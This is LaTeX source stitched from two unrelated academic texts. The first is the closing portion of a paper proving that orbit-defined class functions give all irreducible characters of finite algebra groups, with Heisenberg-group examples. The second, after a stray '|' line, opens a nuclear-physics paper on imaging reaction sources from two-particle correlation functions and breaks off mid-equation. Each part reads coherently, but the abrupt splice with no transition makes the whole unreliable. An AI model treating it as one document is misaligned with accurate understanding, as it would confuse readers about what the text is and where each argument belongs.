$\calO^{\prime}$ is the $G$-orbit which contains the element $f + \alp e^{*}$;
we denote this $G$-orbit by $\calO(\alp)$.
It follows that $${\phi_{0}}^{G} = \sum_{\alp \in \Gam}
\phi_{\calO(\alp)}$$ where $\Gam \subseteq \mathbb{F}_{q}$ is such that the $G$-orbits
$\calO(\alp)$, for $\alp \in \Gam$, are all distinct.
Suppose that $\calO$ is of type II. Then $\calL(f) \subseteq \calO$ (by
\refp{types}) and so $\calO(\alp) = \calO$ for all $\alp \in \mathbb{F}_{q}$. It
follows that, in this case, $\ord{\Gam} = 1$ and so
$${\phi_{0}}^{G} = \phi$$ as required (in part (b)).
On the other hand, suppose that $\calO$ is of type I. Let $\alp \in
\mathbb{F}_{q}$ be arbitrary. Then, by \refp{types}, the $G$-orbit $\calO(\alp)$
is also of type I; otherwise, $\calL(f) = \calL(f + \alp e^{*}) \subseteq
\calO(\alp)$, hence $f \in \calO(\alp)$ and $\calO = \calO(\alp)$ would be
of type II, a contradiction. Therefore, by \refp{char}, $\ord{\calO(\alp)} =
\ord{\calO_{0}}$ and so $$q \sqrt{\ord{\calO_{0}}} = {\phi_{0}}^{G}(1) =
\sum_{\alp \in \Gam} \phi_{\calO(\alp)}(1) = \sum_{\alp \in \Gam}
\sqrt{\ord{\calO(\alp)}} = \ord{\Gam} \sqrt{\ord{\calO_{0}}}.$$ It
follows that $\ord{\Gam} = q$ and so $\Gam = \mathbb{F}_{q}$. In particular, we
conclude that the $G$-orbits $\calO(\alp)$, for $\alp \in \mathbb{F}_{q}$, are
all distinct. Moreover, we obtain $${\phi_{0}}^{G} = \sum_{\alp \in
\mathbb{F}_{q}} \phi_{\calO(\alp)}$$ as required (in part (a)).
The proof is complete.
\end{proof}
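Both parts can be illustrated in the Heisenberg example; we sketch the two computations.

```latex
Let $J$ be the $\mathbb{F}_{q}$-algebra of strictly upper triangular $3 \times 3$
matrices with basis $e_{12}, e_{23}, e_{13}$, let $U = \mathbb{F}_{q} e_{12} +
\mathbb{F}_{q} e_{13}$ and $H = 1+U$. First, let $\calO_{0} = \left\{ f_{0}
\right\}$ where $f_{0} \in U^{*}$ is the restriction of $f = e_{13}^{*}$;
the $G$-orbit $\calO$ of $f$ is of type II, and part (b) asserts that
the linear character $\phi_{0}$ of the abelian group $H$ induces
irreducibly: ${\phi_{0}}^{G} = \phi_{\calO}$ has degree $q$. Next, let
$\calO_{0} = \left\{ f_{0} \right\}$ where $f_{0}$ is the restriction of
$f = e_{12}^{*}$; now the $G$-orbit of $f$ is of type I and, taking $e =
e_{23}$ and $e^{*} = e_{23}^{*}$, part (a) gives $${\phi_{0}}^{G} =
\sum_{\alp \in \mathbb{F}_{q}} \phi_{\calO(\alp)}$$ where $\calO(\alp) = \left\{
e_{12}^{*} + \alp e_{23}^{*} \right\}$: the induced character is the sum
of $q$ distinct linear characters of $G$.
```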
As a consequence (of the proof) we deduce the following result.
\prop{inv}
Let $H$ be a maximal algebra subgroup of $G$, let $U \subseteq J$ be such
that $H = 1+U$ and let $\apl{\pi}{J^{*}}{U^{*}}$ be the natural
projection. Let $\calO_{0} \in \bfOme(H)$ be arbitrary and let $\calO
\in \bfOme(G)$ be an arbitrary $G$-orbit satisfying $\calO_{0} \subseteq
\pi(\calO)$. Then, the following statements hold:
\begin{enumerate}
\al{a} Suppose that $\calO$ is of type I (with respect to $H$). Let
$e \in J$ be such that $J = U \+ \mathbb{F}_{q} e$ and let $e^{*} \in
U^{\perp}$ be such that $e^{*}(e) = 1$. Let $f \in \calO$ be
arbitrary and, for each $\alp \in \mathbb{F}_{q}$, let $\calO(\alp) \in \bfOme(G)$
denote the $G$-orbit which contains the element $f + \alp e^{*} \in
J^{*}$. Then, the $G$-orbits $\calO(\alp)$, for $\alp \in \mathbb{F}_{q}$,
are all distinct and the inverse image $\pi^{-1}(\calO_{0})$ decomposes
as the disjoint union $$\pi^{-1}(\calO_{0}) = \bigcup_{\alp \in \mathbb{F}_{q}}
\calO(\alp)$$ of the $G$-orbits $\calO(\alp) \in \bfOme(G)$, for $\alp
\in \mathbb{F}_{q}$.
\al{b} If $\calO$ is of type II (with respect to $H$), then
$\pi^{-1}(\calO_{0}) \subseteq \calO$. Moreover, this inclusion is proper.
\end{enumerate}
\end{propos}
\begin{proof}
Suppose that $\calO$ is of type I. Let $\alp \in \mathbb{F}_{q}$ be arbitrary.
Then, as we have seen in the proof of \refp{ind}, $\calO(\alp)$ is also
of type I and so $\pi(\calO(\alp)) = \calO_{0}$ (by \refp{dec} because
$\calO_{0} \subseteq \pi(\calO(\alp))$). It follows that $\calO(\alp) \subseteq
\pi^{-1}(\calO_{0})$. Conversely, suppose that $g \in J^{*}$ is such
that $\pi(g) \in \calO_{0}$. Since $\calO_{0} = \pi(\calO)$, there
exists $x \in G$ such that $\pi(g) = \pi(x \cdot f)$. It follows that
$g \in \calL(x \cdot f)$. Since $\calL(x \cdot f) = x \cdot
\calL(f)$ and since $\calL(f) = f + U^{\perp}$, we conclude that
$g = x \cdot \left( f + \alp e^{*} \right)$ (hence, $g \in \calO(\alp)$)
for some $\alp \in \mathbb{F}_{q}$. This completes the proof of part (a).
Now, suppose that $\calO$ is of type II. Let $g \in J^{*}$ be such
that $\pi(g) \in \calO_{0}$. Since $\calO_{0} \subseteq \pi(\calO)$, there
exists $f \in \calO$ such that $\pi(g) = \pi(f)$. Therefore, $g \in
\calL(f)$. Since $\calO$ is of type II, $\calL(f) \subseteq \calO$ (by
\refp{types}) and so $g \in \calO$. Since $g \in \pi^{-1}(\calO_{0})$ is
arbitrary, we conclude that $\pi^{-1}(\calO_{0}) \subseteq \calO$. To see
that this inclusion is proper, it is enough to choose $g \in \calO$
such that $\pi(g) \in x_{\alp} \cdot \calO_{0}$ for some $\alp \in
\mathbb{F}_{q}$, $\alp \neq 0$, where $\left\{ x_{\alp} \colon \alp \in \mathbb{F}_{q} \right\}$
is as in \refp{dec}.
\end{proof}
\sec{irred}{Irreducible characters}
The purpose of this section is the proof of the following result.
\th{irred}
Let $G$ be an arbitrary $\mathbb{F}_{q}$-algebra group. Then, for each $\calO
\in \bfOme(G)$, the class function $\phi_{\calO}$ is an irreducible
character of $G$. Moreover, we have $\irr(G) = \left\{ \phi_{\calO}
\colon \calO \in \bfOme(G) \right\}$.
\eth
By \refp{ortho}, it is enough to show that the class functions
$\phi_{\calO} \in \operatorname{cf}(G)$, $\calO \in \bfOme(G)$, are, in fact,
characters. And, to see this, we proceed by induction on $\ord{G}$ (the
result being clear if $\ord{G} = 1$). The key step is handled by the
following lemma. As before, $G = 1+J$ where $J = J(A)$ is the
Jacobson radical of a finite dimensional $\mathbb{F}_{q}$-algebra $A$.
\lem{irred}
Let $H$ be a maximal algebra subgroup of $G$, let $U \subseteq J$ be
such that $H = 1 + U$ and let $\pi \colon J^{*} \rightarrow U^{*}$ be
the natural projection. Let $\calO \in \bfOme(G)$ and let $\calO_{0} \in
\bfOme(H)$ be any $H$-orbit with $\calO_{0} \subseteq \pi(\calO)$. Assume
that the class function $\phi_{\calO_{0}} \in \operatorname{cf}(H)$ is a character
of $H$. Then, the class function $\phi_{\calO} \in \operatorname{cf}(G)$ is a
character of $G$.
\end{lemma}
The proof of \refl{irred} relies on the following result (and on its
corollary).
\lem{char}
Let $H$ be a maximal algebra subgroup of $G$, let $\chi \in \irr(G)$
and let $\tet \in \irr(H)$ be an irreducible constituent of $\chi_{H}$.
Then one (and only one) of the following two possibilities occurs:
\begin{enumerate}
\al{a} $\chi_{H} = \tet$ is an irreducible character of $H$ and
$\tet^{G}$ has $q$ distinct irreducible constituents each one
occurring with multiplicity one. The irreducible constituents of
$\tet^{G}$ are the characters $\lam \chi$ for $\lam \in \irr(G/H)$
(as usual, $\irr(G/H)$ is naturally identified with a subset of
$\irr(G)$).
\al{b} $\tet^{G} = \chi$ is an irreducible character of $G$ and
$\chi_{H}$ has $q$ distinct irreducible constituents each one
occurring with multiplicity one.
\end{enumerate}
\end{lemma}
\begin{proof}
By \cite[Corollary~11.29]{isaacs2}, we know that $\chi(1)/\tet(1)$
divides $\ord{G:H}$ (we recall that $H$ is a normal subgroup of
$G$). Since $G$ and $H$ are $\mathbb{F}_{q}$-algebra groups,
\cite[Theorem~A]{isaacs1} asserts that $\chi(1)$ and $\tet(1)$ are
powers of $q$. Moreover, being a maximal algebra subgroup of $G$, we
know that $H$ has index $q$ in $G$. It follows that, either
$\chi(1) = \tet(1)$, or $\chi(1) = q \tet(1)$.
Suppose that $\chi(1) = \tet(1)$. Then, we must have $\chi_{H} =
\tet$ and this is the situation of (a). The assertion concerning the
induced character is an easy application of a result of Gallagher (see
\cite[Corollary~6.17]{isaacs2}).
On the other hand, suppose that $\chi(1) = q \tet(1)$. Then $\chi =
\tet^{G}$ (because $\tet^{G}(1) = q \tet(1)$ and because, by
Frobenius reciprocity, $\chi$ is an irreducible constituent of
$\tet^{G}$). By Clifford's Theorem (see, for example,
\cite[Theorem~6.2]{isaacs2}), we have $$\chi_{H} = e \sum_{i=1}^{t}
\tet_{i}$$ where $\tet = \tet_{1}, \tet_{2}, \ldots, \tet_{t}$ are
all the distinct conjugates of $\tet$ in $G$ and where $e = \left\langle
\chi_{H}, \tet \right\rangle_{H}$. (The $G$-action on $\irr(H)$ is defined as
usual by $\tet^{x}(y) = \tet(x^{-1} y x)$ for all $\tet \in \irr(H)$,
all $x \in G$ and all $y \in H$.) By Frobenius reciprocity, we deduce
that $\left\langle \chi_{H}, \tet \right\rangle_{H} = \left\langle \chi, \tet^{G} \right\rangle_{G} =
1$ (because $\chi = \tet^{G}$). It follows that $\chi(1) =
\sum_{i=1}^{t} \tet_{i}(1) = t \tet(1)$ (because $\tet_{i}(1) =
\tet(1)$ for all $1 \leq i \leq t$) and so $t = q$.
The proof is complete.
\end{proof}
The following easy consequence will also be very useful.
\cor{frob}
Let $H$ be a maximal algebra subgroup of $G$ and let $\chi, \chi^{\prime} \in
\irr(G)$. Then, the following hold:
\begin{enumerate}
\al{a} If $\chi_{H}$ is irreducible, then $\left\langle \chi_{H}, \chi^{\prime}_{H}
\right\rangle_{H} \neq 0$ if and only if $\chi^{\prime} = \lam \chi$ for some $\lam
\in \irr(G/H)$.
\al{b} If $\chi_{H}$ is reducible, then $\left\langle \chi_{H}, \chi^{\prime}_{H}
\right\rangle_{H} \neq 0$ if and only if $\chi^{\prime} = \chi$. Moreover, we have
$\left\langle \chi_{H}, \chi_{H} \right\rangle_{H} = q$.
\end{enumerate}
\end{corol}
\begin{proof}
Suppose that $\chi_{H} = \tet \in \irr(H)$. By Frobenius reciprocity,
we have $\left\langle \tet, \chi^{\prime}_{H} \right\rangle_{H} = \left\langle \tet^{G}, \chi^{\prime}
\right\rangle_{G}$ and so $\left\langle \chi_{H}, \chi^{\prime}_{H} \right\rangle_{H} \neq 0$ if and only
if $\chi^{\prime} = \lam \chi$ for some $\lam \in \irr(G/H)$ (by part (a) of
\refl{char}).
On the other hand, suppose that $\chi_{H}$ is reducible and let
$\chi^{\prime} \in \irr(G)$ be such that $\left\langle \chi_{H}, \chi^{\prime}_{H} \right\rangle_{H}
\neq 0$. Then, there exists $\tet \in \irr(H)$ such that $\left\langle
\tet, \chi_{H} \right\rangle_{H} \neq 0$ and $\left\langle \tet, \chi^{\prime}_{H} \right\rangle_{H}
\neq 0$. By part (b) of \refl{char}, we have $\chi = \tet^{G}$ and
so, using Frobenius reciprocity, we deduce that $\left\langle \chi, \chi^{\prime}
\right\rangle_{G} = \left\langle \tet^{G}, \chi^{\prime} \right\rangle_{G} = \left\langle \tet, \chi^{\prime}_{H}
\right\rangle_{H} \neq 0$. Since $\chi, \chi^{\prime} \in \irr(G)$, we conclude
that $\chi = \chi^{\prime}$. Finally, by part (b) of \refl{char}, it is clear
that $\left\langle \chi_{H}, \chi_{H} \right\rangle_{H} = q$.
The proof is complete.
\end{proof}
We are now able to prove \refl{irred}.
\renewcommand{\proofname}{Proof of \refl{irred}}
\begin{proof}
For simplicity, we write $\phi = \phi_{\calO}$ and $\phi_{0} =
\phi_{\calO_{0}}$. If $\calO$ is of type II with respect to $H$, then
$\phi = (\phi_{0})^{G}$ (by \refp{ind}) and the result is clear. On
the other hand, suppose that $\calO$ is of type I with respect to $H$.
Then, by \refp{rest}, $\phi_{0} = \phi_{H}$ and, by \refp{ind}, $\left\langle {\phi_{0}}^{G},
{\phi_{0}}^{G} \right\rangle_{G} = q$. By \refp{ortho}, we have $$\phi =
\sum_{\chi \in \irr(G)} \mu_{\chi} \chi$$ where $\mu_{\chi} \in \CC$ for
all $\chi \in \irr(G)$. Let $\calI = \left\{ \chi \in \irr(G) \colon
\mu_{\chi} \neq 0 \right\}$ be the support of $\phi$. Since $\left\langle \phi, \phi
\right\rangle_{G} = 1$, we have
\eq{mu}
\sum_{\chi \in \calI} \ord{\mu_{\chi}}^{2} = 1.
\end{equation}
Now, we consider the restriction
\eq{rest}
\phi_{0} = \phi_{H} = \sum_{\chi \in \calI} \mu_{\chi} \chi_{H}
\end{equation}
of $\phi$ to $H$.
We claim that $\chi_{H} \in \irr(H)$ for all $\chi \in \calI$. To see
this, suppose that $\chi_{H}$ is reducible for some $\chi \in \calI$.
Let $\tet \in \irr(H)$ be an irreducible constituent of $\chi_{H}$. Then,
$\tet$ occurs in the sum on the right-hand side of \refe{rest} with
coefficient $\mu_{\chi}$; in fact, $\left\langle \tet, \chi_{H} \right\rangle_{H} =
1$ (by \refl{char}) and $\left\langle \tet, \chi^{\prime}_{H} \right\rangle_{H} = 0$ for
all $\chi^{\prime} \in \irr(G)$ with $\chi^{\prime} \neq \chi$ (otherwise, $\left\langle
\chi_{H}, \chi^{\prime}_{H} \right\rangle_{H} \neq 0$ and this is in contradiction
with \refc{frob}). It follows that \refe{rest} has the form
\eq{rest2}
\phi_{0} = \mu_{\chi} \tet_{1} + \cdots + \mu_{\chi} \tet_{q} + \xi
\end{equation}
where $\tet_{1} = \tet, \tet_{2}, \ldots, \tet_{q}$ are the $q$ distinct
irreducible constituents of $\chi_{H}$ (see \refl{char}) and where $\xi
\in \operatorname{cf}(H)$ is a $\CC$-linear combination of the elements of $\irr(H) \setminus \left\{
\seq{\tet}{q} \right\}$. Now, since $\phi_{0}$ is a character of $H$ (by
assumption) and since $\left\langle \phi_{0}, \phi_{0} \right\rangle_{H} = 1$ (by
\refp{ortho}), we have $\phi_{0} \in \irr(H)$. Since $\irr(H)$ is a
$\CC$-basis of $\operatorname{cf}(H)$, the equality \refe{rest2} implies that
$\mu_{\chi} = 0$ and this is in contradiction with $\chi \in \calI$. This
completes the proof of our claim, i.e., $\chi_{H} \in \irr(H)$ for all
$\chi \in \calI$.
Now, for each $\tet \in \irr(H)$, let $\calI_{\tet} = \left\{ \chi \in
\calI \colon \chi_{H} = \tet \right\}$ and let $$\mu_{\tet} = \sum_{\chi \in
\calI_{\tet}} \mu_{\chi}.$$ Then $\calI$ is the disjoint union $$\calI =
\bigcup_{\tet \in \irr(H)} \calI_{\tet}$$ and so $$\phi_{0} = \sum_{\tet
\in \irr(H)} \mu_{\tet} \tet.$$ Since $\phi_{0} \in \irr(H)$, we conclude
that $\mu_{\tet} = \del_{\tet, \phi_{0}}$ for all $\tet \in \irr(H)$.
Hence, $$\sum_{\chi \in \calI} \mu_{\chi} = \sum_{\tet \in \irr(H)}
\mu_{\tet} = 1.$$ Using \refe{mu}, we easily deduce that there exists
a unique $\chi \in \irr(G)$ with $\mu_{\chi} \neq 0$ and, in fact,
$\mu_{\chi} = 1$.
The proof is complete.
\end{proof}
\renewcommand{\proofname}{Proof}
\sec{proof}{Proof of \reft{main}}
In this section, we prove \reft{main}. As before, let $A$ be a
finite dimensional $\mathbb{F}_{q}$-algebra, let $J = J(A)$ be the Jacobson radical
of $A$ and let $G = 1+J$ be the $\mathbb{F}_{q}$-algebra group defined by $J$.
We consider the chain $J \supseteq J^{2} \supseteq J^{3} \supseteq \ldots$ of ideals
of $A$. Since $J$ is nilpotent, there exists a largest integer $m$ with
$J^{m} \neq \left\{ 0 \right\}$. Moreover, we may refine the chain $$J \supseteq
J^{2} \supseteq \ldots \supseteq J^{m} \supseteq \left\{ 0 \right\}$$ to obtain a (maximal)
chain $$\left\{ 0 \right\} = U_{0} \subseteq U_{1} \subseteq \ldots \subseteq U_{n} =
J$$ of ideals of $A$ satisfying $$\dim U_{i+1} = \dim U_{i}+1$$ for
all $0 \leq i < n$. Let $f \in J^{*}$ be arbitrary and, for each $0 \leq
i \leq n$, let $$R_{i} = \left\{ a \in U_{i} \colon f([ab]) = 0 \text{ for all } b \in
U_{i} \right\}.$$ Finally, let $$U = R_{1} + \cdots + R_{n}.$$
It is clear that $U$ is an $\mathbb{F}_{q}$-subspace of $J$. Now, let $a,b \in U$
and suppose that $a \in R_{i}$ and $b \in R_{j}$ for some $1 \leq i, j
\leq n$ with $i \leq j$. We claim that $ab \in R_{i}$. To see this, let
$c \in U_{i}$ be arbitrary. Then, $$f([ab,c]) = f([a,bc]) + f([b,ca]).$$
Since $U_{i}$ is an ideal of $A$, we have $bc \in U_{i}$, hence
$f([a,bc]) = 0$ (because $a \in R_{i}$). On the other hand, we have $ca
\in U_{i}$. Since $U_{i} \subseteq U_{j}$ (because $i \leq j$) and
since $b \in R_{j}$, we conclude that $f([b,ca]) = 0$. Thus $$f([ab,c]) =
f([a,bc]) + f([b,ca]) = 0$$ and so $ab \in R_{i}$ (because $c \in U_{i}$
is arbitrary). It follows that $U$ is a multiplicatively closed
$\mathbb{F}_{q}$-subspace of $J$. Hence, $H = 1+U$ is an algebra subgroup of $G$.
Moreover, a similar argument shows that $$f([a,b]) = 0$$ for all $a,b \in
U$. This means that $U$ is an {\it $f$-isotropic} $\mathbb{F}_{q}$-subspace of
$J$ (i.e., $U$ is isotropic with respect to the skew-symmetric bilinear form
$B_{f}$ which was defined in \refs{class}.) Next, we claim that $U$ is
a maximal $f$-isotropic $\mathbb{F}_{q}$-subspace of $J$. By Witt's Theorem (see,
for example, \cite[Theorems~3.10~and~3.11]{artin}), it is enough to
prove that
\eq{mdim}
\dim U = \frac{1}{2} \left( \dim J + \dim \operatorname{Rad}(f) \right).
\end{equation}
To see this, we proceed by induction on $\dim J$. If $\dim J = 1$, then
$U = J = \operatorname{Rad}(f)$ and the claim is trivial. Now, suppose that $\dim J >
1$ and consider the ideal $U_{n-1}$ of $J$. Let $$U^{\prime} = R_{1} + \cdots +
R_{n-1}.$$ By induction, we have $$\dim U^{\prime} = \frac{1}{2} \left( \dim
U_{n-1} + \dim \operatorname{Rad}(f^{\prime}) \right)$$ where $f^{\prime}$ is the restriction of $f$
to $U_{n-1}$. Using \refp{rad} and \refp{char}, we conclude that either
$\dim \operatorname{Rad}(f) = \dim \operatorname{Rad}(f^{\prime}) - 1$, or $\dim \operatorname{Rad}(f) = \dim
\operatorname{Rad}(f^{\prime}) + 1$. In the first case, we deduce that $$\dim U^{\prime} =
\frac{1}{2} \left( \dim J - 1 + \dim \operatorname{Rad}(f) + 1 \right) = \frac{1}{2} \left(
\dim J + \dim \operatorname{Rad}(f) \right).$$ Therefore, $U^{\prime}$ is a maximal $f$-isotropic
$\mathbb{F}_{q}$-subspace of $J$. Since $U^{\prime} \subseteq U$, we conclude that $U^{\prime} = U$
and \refe{mdim} follows in this case. On the other hand, suppose that
$\dim \operatorname{Rad}(f) = \dim \operatorname{Rad}(f^{\prime}) + 1$. Then, $$\dim U^{\prime} = \frac{1}{2} \left(
\dim J - 1 + \dim \operatorname{Rad}(f) - 1 \right) = \frac{1}{2} \left( \dim J + \dim
\operatorname{Rad}(f) \right) - 1.$$ Since $U^{\prime} \subseteq U$, we have $\dim U^{\prime} \leq \dim
U$. If $\dim U^{\prime} = \dim U$, then $U^{\prime} = U$ and so $\operatorname{Rad}(f) \subseteq U^{\prime}
\subseteq U_{n-1}$. If this were the case, we should have $\operatorname{Rad}(f) \subseteq
\operatorname{Rad}(f^{\prime})$ and so $\dim \operatorname{Rad}(f) \leq \dim \operatorname{Rad}(f^{\prime})$, a
contradiction. It follows that $$\dim U^{\prime} < \dim U.$$ Since $U$ is an
$f$-isotropic $\mathbb{F}_{q}$-subspace of $J$, we deduce that $$\dim U^{\prime} \leq \dim
U - 1 \leq \frac{1}{2} \left( \dim J + \dim \operatorname{Rad}(f) \right) - 1 = \dim U^{\prime}.$$
Hence equality holds throughout, so that $\dim U = \frac{1}{2} \left( \dim J
+ \dim \operatorname{Rad}(f) \right)$, and the proof of \refe{mdim} is complete.
Given an arbitrary element $f \in J^{*}$, we will say that a multiplicatively
closed $\mathbb{F}_{q}$-subspace $U$ of $J$ is an {\bf $f$-polarization} if $U$ is
a maximal $f$-isotropic $\mathbb{F}_{q}$-subspace of $J$. Hence, we have proved
the following.
\prop{polar}
Let $f \in J^{*}$ be arbitrary. Then, there exists an $f$-polariza\-tion
$U \subseteq J$.
\end{propos}
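To illustrate the construction of polarizations (this example is included
only for orientation and is not used in the sequel), let $J$ be the algebra
of strictly upper triangular $3 \times 3$ matrices over $\mathbb{F}_{q}$,
with basis $e_{12}, e_{13}, e_{23}$, so that $G = 1+J$ is the Heisenberg
group of order $q^{3}$. Take $f = e_{13}^{*} \in J^{*}$, i.e., $f(a) =
a_{13}$. Then $B_{f}(a,b) = f([a,b]) = a_{12}b_{23} - a_{23}b_{12}$, hence
$\operatorname{Rad}(f) = \mathbb{F}_{q} e_{13}$ and, in agreement with \refe{mdim}, a
maximal $f$-isotropic subspace has dimension $\frac{1}{2}(3+1) = 2$.
Refining the chain through the ideals $U_{1} = \mathbb{F}_{q} e_{13}$ and
$U_{2} = \mathbb{F}_{q} e_{12} + \mathbb{F}_{q} e_{13}$, the construction
above gives $R_{1} = U_{1}$, $R_{2} = U_{2}$ (as $U_{2}$ is abelian) and
$R_{3} = \operatorname{Rad}(f) = U_{1}$, so that $U = \mathbb{F}_{q} e_{12} +
\mathbb{F}_{q} e_{13}$. Since $U^{2} = \left\{ 0 \right\}$, the subspace
$U$ is multiplicatively closed, and it is an $f$-polarization. The linear
character $\lam_{f}(1+a) = \psi(f(a)) = \psi(a_{13})$ of $H = 1+U$ then
induces an irreducible character of $G$ of degree $q = \sqrt{q^{\dim J -
\dim \operatorname{Rad}(f)}}$, as asserted in \reft{main}.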
Now, it is easy to conclude the proof of \reft{main}.
\renewcommand{\proofname}{Proof of \reft{main}}
\begin{proof}
Let $\chi$ be an (arbitrary) irreducible character of $G$. Then, by
\reft{irred}, $\chi = \phi_{\calO}$ for some $G$-orbit $\calO \in
\bfOme(G)$. Let $f \in \calO$ be arbitrary and let $U \subseteq J$ be an
$f$-polarization. Then, $H = 1+U$ is an algebra subgroup of $G$. Let
$f_{0} \in U^{*}$ be the restriction of $f$ to $U$. Since $U$ is
$f$-isotropic, we have $\operatorname{Rad}(f_{0}) = U$, hence $C_{H}(f_{0}) = H$ (by
\refp{rad}). It follows that $\calO_{0} = \left\{ f_{0} \right\}$ is a
single $H$-orbit on $U^{*}$ (i.e., an element of $\bfOme(H)$). We denote
by $\lam_{f}$ the class function $\phi_{\calO_{0}}$ of $H$; by
definition, $\lam_{f} \colon H \rightarrow \CC$ is defined by
$$\lam_{f}(1+a) = \psi_{f}(a) = \psi(f(a))$$ for all $a \in U$. By
\reft{irred}, we know that $\lam_{f}$ is an irreducible
character of $H$. Moreover, $\lam_{f}(1) = \sqrt{\ord{\calO_{0}}} = 1$,
i.e., $\lam_{f}$ is a linear character of $H$. To conclude the proof,
we claim that
\eq{induced}
\phi_{\calO} = {\lam_{f}}^{G}.
\end{equation}
To see this, we evaluate the Frobenius product $\left\langle \phi_{\calO},
{\lam_{f}}^{G} \right\rangle_{G}$. Using Frobenius reciprocity (and the
definition of $\phi_{\calO}$), we deduce that
\begin{eqnarray*}
\left\langle \phi_{\calO}, {\lam_{f}}^{G} \right\rangle_{G} & = & \left\langle
(\phi_{\calO})_{H}, \lam_{f} \right\rangle_{H} \\
& = & \frac{1}{\ord{H}} \sum_{x \in H} \phi_{\calO}(x)
\overline{\lam_{f}(x)} \\
& = & \frac{1}{\ord{U}} \sum_{a \in U} \left(
\frac{1}{\sqrt{\ord{\calO}}} \sum_{g \in \calO} \psi_{g}(a) \right)
\overline{\psi_{f}(a)} \\
& = & \frac{1}{\sqrt{\ord{\calO}}} \sum_{g \in \calO} \left(
\frac{1}{\ord{U}} \sum_{a \in U} \psi_{g}(a) \overline{\psi_{f}(a)} \right) \\
& = & \frac{1}{\sqrt{\ord{\calO}}} \sum_{g \in \calO} \left\langle \psi_{g}, \psi_{f} \right\rangle_{U^{+}}.
\end{eqnarray*}
By \refe{irrJ}, given any $g \in J^{*}$, we have $\left\langle \psi_{g},
\psi_{f} \right\rangle_{U^{+}} \neq 0$ if and only if $f(a) = g(a)$ for all $a \in
U$; in other words, $\left\langle \psi_{g}, \psi_{f} \right\rangle_{U^{+}} \neq 0$ if and
only if $g \in f+U^{\perp}$. Since $\psi_{g}$ is linear for all $g \in
J^{*}$, we conclude that
\eq{frobenius}
\left\langle \phi_{\calO}, {\lam_{f}}^{G} \right\rangle_{G} = \frac{\ord{(f+U^{\perp})
\cap \calO}}{\sqrt{\ord{\calO}}}.
\end{equation}
It follows that $\left\langle \phi_{\calO}, {\lam_{f}}^{G} \right\rangle_{G} \neq 0$
(because $f \in (f+U^{\perp}) \cap \calO$), hence $\phi_{\calO}$ is an
irreducible constituent of ${\lam_{f}}^{G}$. On the other hand, we
have $\phi_{\calO}(1) = \sqrt{\ord{\calO}}$ and
\begin{eqnarray*}
{\lam_{f}}^{G}(1) & = & \ord{G:H} \lam_{f}(1) = q^{\dim J - \dim U} \\
& = & \sqrt{q^{\dim J - \dim \operatorname{Rad}(f)}} = \sqrt{\ord{G:C_{G}(f)}} =
\sqrt{\ord{\calO}}
\end{eqnarray*}
(using \refe{mdim} and \refp{rad}). The claim \refe{induced} follows and
the proof of \reft{main} is complete.
\end{proof}
\renewcommand{\proofname}{Proof}
|
\section{Introduction}
Imaging techniques are used in many diverse
areas such as geophysics, astronomy, medical diagnostics, and police
work. The goal of imaging varies widely from determining the density
of the Earth's interior to reading license plates from
blurred photographs to issue speeding fines. My own interest
in the problem stems from seeing an image of Betelgeuse, a~red
giant $\sim 600$~ly away that has irregular features changing
with time. The~image was obtained using intensity
interferometry such as used in nuclear physics~\cite{boa90}.
After seeing this, the natural question was whether images could be
obtained for nuclear reactions. Needless to say, answers to such
questions tend to be negative.
In a~typical imaging problem, the~measurements yield
a~function (in our case, the correlation function $C$) which is related
in a~linear fashion to the function of interest (in our case, the
source function $S$):
\begin{equation}
\label{CKS}
C(q) = \int dr \, K(q,r) \, S(r) \, .
\end{equation}
In other words, given the data for $C$ with errors, the task of
imaging is the determination of the source function~$S$.
Generally, this requires an~inversion of the kernel~$K$. The~more
singular the kernel~$K$, the~better the chances for a~successful
restoration of~$S$.
In reactions with many particles in the final state, there is a~linear
relation of the type (\ref{CKS})
between the two-particle cross section $d^6 \sigma / d^3 \vec{ p}_1 \,
d^3 \vec{ p}_2$ and the unnormalized relative distribution of emission
points~$S'$ for
two particles. Interference and interaction terms between the two
particles of interest may be separated out from the general amplitude for the
reaction and described in terms of the two-particle
wavefunction~$\Phi^{(-)}$ (see Fig.~\ref{source}).
\begin{figure}
\begin{center}
\includegraphics[angle=0.0,
width=0.72\textwidth]{source.eps}
\end{center}
\caption{Separation of the interference and final-state
interactions, in terms of the two-particle wavefunction, from
the amplitude for the reaction.}
\label{source}
\end{figure}
The~rest of the amplitude squared, integrated in the cross
section over unobserved particles, yields the unnormalized Wigner
function~$S'$ for the distribution of emission points written
here in the two-particle frame:
\begin{equation}
{d^6 \sigma \over d^3{ p}_{1} \, d^3{ p}_{2}} =
\int
d^3{ r} \,
S'_{\vec{P}}(\vec{ r}) \,
|\Phi_{\vec{ p}_1 - \vec{ p}_2}^{(-)} (\vec{ r})|^2 \, .
\label{2PS}
\end{equation}
The vector $\vec{ r}$ is the relative separation between
emission
points and the equation refers to the case of particles with equal masses.
The size of the source~$S'$ is of the order of the spatial extent of the
reaction. The~possibility of probing structures of this size arises
when the wave-function modulus squared, $|\Phi^{(-)}|^2$, possesses
pronounced structures, either due to interaction or symmetrization,
that vary rapidly with the relative momentum, typically at low
momenta.
The two-particle cross section can be normalized to the
single-particle cross sections to yield the correlation
function~$C$:
\begin{equation}
C(\vec{ p}_1 - \vec{ p}_2) =
{ {d^6 \sigma \over d^3{ p}_{1} \, d^3{ p}_{2}} \over
{d^3 \sigma \over d^3{ p}_{1}} \, {d^3 \sigma \over
d^3{ p}_{2}}} = \int
d^3{ r} \,
S_{\vec{ P}} (\vec{ r}) \,
|\Phi_{\vec{ p}_1 - \vec{ p}_2}^{(-)} (\vec{ r})|^2 \, .
\label{CPS}
\end{equation}
The source~$S$ is normalized to~1 as, for large
relative momenta, $C$ is close to~1 and $|\Phi|^2$ in
(\ref{CPS}) averages to~1:
\begin{equation}
\int d^3{ r}
\, S_{\vec{P}} (\vec{ r}) = 1 \, .
\end{equation}
Depending on how the particles are emitted from a~reaction, the
source may have different features. For a~prompt emission, we expect
the~source to be compact and generally isotropic. In the
case of prolonged emission, we expect the~source to be
elongated along the pair momentum, as the emitting system moves
in the two-particle cm. Finally, in the case of secondary
decays, we expect the~source to have an~extended tail.
In the following, I shall discuss restoring the
sources in heavy-ion reactions and extracting information
from the images \cite{bro97}.
\section{Imaging in the Reactions}
The interesting part of the correlation function is its deviation from~1
so we rewrite~(\ref{CPS})
\begin{eqnarray}
\nonumber
\Rftn{P}{q} =
\Corrftn{P}{q}-1
&=& \int \dn{3}{r} \left(\wfsquare{{q}}{{r}}-1\right)
\Source{P}{r} \\
&=& \int \dn{3}{r} K(\vec{q},\vec{r})
\, \Source{P}{r} \, .
